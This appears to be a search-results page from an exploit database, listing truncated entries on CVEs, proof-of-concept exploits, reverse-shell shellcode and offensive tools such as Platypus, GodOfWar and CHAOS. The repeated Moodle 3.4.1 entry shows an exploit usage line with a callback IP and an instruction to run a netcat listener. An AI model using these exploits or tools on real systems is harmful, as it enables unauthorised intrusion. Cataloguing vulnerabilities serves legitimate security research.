1828 matches found
Vim < 8.1.1365 / Neovim < 0.3.6 - Arbitrary Code Execution
by Arminius @rawsec. Vim/Neovim Arbitrary Code Execution via Modelines. Product: Vim 8.1.1365, Neovim 0.3.6. Type: Arbitrary Code Execution. CVE: CVE-2019-12735. Date: 2019-06-04. Author: Arminius @rawsec. Summary: Vim before 8.1.1365 and Neovim...
CVE-2018-19977
A command injection (missing input validation, escaping) in the ftp upgrade configuration interface on the Auerswald COMfort 1200 IP phone 3.4.4.1-10589 allows an authenticated remote attacker (simple user) -- in the same network as the device -- to trigger OS commands like starting telnetd or openin...
CVE-2018-16217
The network diagnostic function ping in the Yeahlink Ultra-elegant IP Phone SIP-T41P firmware 66.83.0.35 allows a remote authenticated attacker to trigger OS commands or open a reverse shell via command injection...
Command injection
The network diagnostic function ping in the Yeahlink Ultra-elegant IP Phone SIP-T41P firmware 66.83.0.35 allows a remote authenticated attacker to trigger OS commands or open a reverse shell via command injection...
GitLab: Privilege escalation due to insecure use of logrotate
Summary: GitLab sets the ownership of the log directory to the system user "git", which might let local users obtain root access because of unsafe interaction with logrotate. Steps to reproduce: Please note that the exploit is just a proof-of-concept. In order to win the race reliably the following...
Exploit for Missing Authentication for Critical Function in Oracle Weblogic_Server
PoC exploit for CVE-2017-10271, an RCE vulnerability in Oracle WebLogic. The exploit targets the async/AsyncResponseService endpoint and uses a SOAP request to inject malicious code. The payload is a Java XMLDecoder that creates a ProcessBuilder to execute a bash shell with a reverse shell payloa...
Linux/x86 - Reverse Shell Shellcode (91 Bytes) + Python Wrapper
Exploit Title: Linux/x86 - Reverse Shell Shellcode 91 Bytes + Python Wrapper Exploit Author: Dave Sully Vendor Homepage: Software Link: NA Version: NA Tested on: Ubuntu 16.04 CVE : NA This is the raw assembly ; Filename: reverseshell.nasm ; Author: Dave Sully ; Website: http://suls.co.uk ; Purpos...
Platypus - A Modern Multiple Reverse Shell Sessions Manager Written In Go
A modern multiple reverse shell sessions/clients manager via terminal written in go. Features Multiple service listening port Multiple client connections RESTful API Reverse shell as a service Screenshot Network Topology Attack IP: 192.168.1.2 Reverse Shell Service: 0.0.0.0:8080 RESTful Service:...
Windows Zero-Day Emerges in Active Exploits
A just-patched vulnerability in the Windows operating system that was previously unknown up until last week is being actively exploited in the wild; it opens the door for full system takeover. Discovered by Vasily Berdnikov and Boris Larin of Kaspersky Lab on St. Patrick’s Day this year, the flaw...
GodOfWar - Malicious Java WAR Builder With Built-In Payloads
A command-line tool to generate war payloads for penetration testing / red teaming purposes, written in ruby. Features Preexisting payloads. try -l/--list cmdget filebrowser bindshell reverseshell reverseshellui Configurable backdoor. try --host/-port Control over payload name. To avoid malicious...
CVE-2019-10478
An issue was discovered on Glory RBW-100 devices with firmware ISP-K05-02 7.0.0. An unrestricted file upload vulnerability in the Front Circle Controller glytoolcgi/settingfileupload.cgi allows attackers to upload supplied data. This can be used to place attacker controlled code on the filesystem...
CHAOS Framework v3.0 - Generate Payloads And Control Remote Windows Systems
CHAOS is a PoC that allows generating payloads and controlling remote operating systems. Features:

| Feature | Windows | Mac | Linux |
|---|---|---|---|
| Reverse Shell | X | X | X |
| Download File | X | X | X |
| Upload File | X | X | X |
| Screenshot | X | X | X |
| Keylogger | X | | |
| Persistence | X | | |
| Open URL | X | X | X |

...
From 0 to Reverse Shell: Practice on the DVAR Router Vulnerability Range
DVAR is a router vulnerability practice range that emulates the ARM architecture. This article explains how to get a reverse shell on it, covering environment setup, locating and exploiting the bugs, and the practical experience gained along the way. 1. Background knowledge This...
CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload
#!/usr/bin/env python Exploit Title: CMS Made Simple authenticated arbitrary file upload in Showtime2 module Date: March 2019 Exploit Author: Daniele Scanu @ Certimeter Group Vendor Homepage: https://www.cmsmadesimple.org/ Software Link: http://viewsvn.cmsmadesimple.org/listing.php?repname=showtim...
Moodle 3.4.1 - Remote Code Execution
Moodle 3.4.1 - Remote Code Execution php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1 user The account username pass The password to the account ip Callback IP port Callback Port course Valid course ID belonging to the teacher Make sure...
CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload
CMS Made Simple Showtime2 Module 3.6.2 - Authenticated Arbitrary File Upload #!/usr/bin/env python Exploit Title: CMS Made Simple authenticated arbitrary file upload in Showtime2 module Date: March 2019 Exploit Author: Daniele Scanu @ Certimeter Group Vendor Homepage: https://www.cmsmadesimple.org...
CMS Made Simple Showtime2 3.6.2 Arbitrary File Upload
#!/usr/bin/env python Exploit Title: CMS Made Simple authenticated arbitrary file upload in Showtime2 module Date: March 2019 Exploit Author: Daniele Scanu @ Certimeter Group Vendor Homepage: https://www.cmsmadesimple.org/ Software Link: http://viewsvn.cmsmadesimple.org/listing.php?repname=showtim...
Moodle 3.4.1 Remote Code Execution
php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1 user The account username pass The password to the account ip Callback IP port Callback Port course Valid course ID belonging to the teacher Make sure you're running a netcat listener on the...
Moodle 3.4.1 - Remote Code Execution Exploit
Exploit for php platform in category web applications php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1 user The account username pass The password to the account ip Callback IP port Callback Port course Valid course ID belonging to the...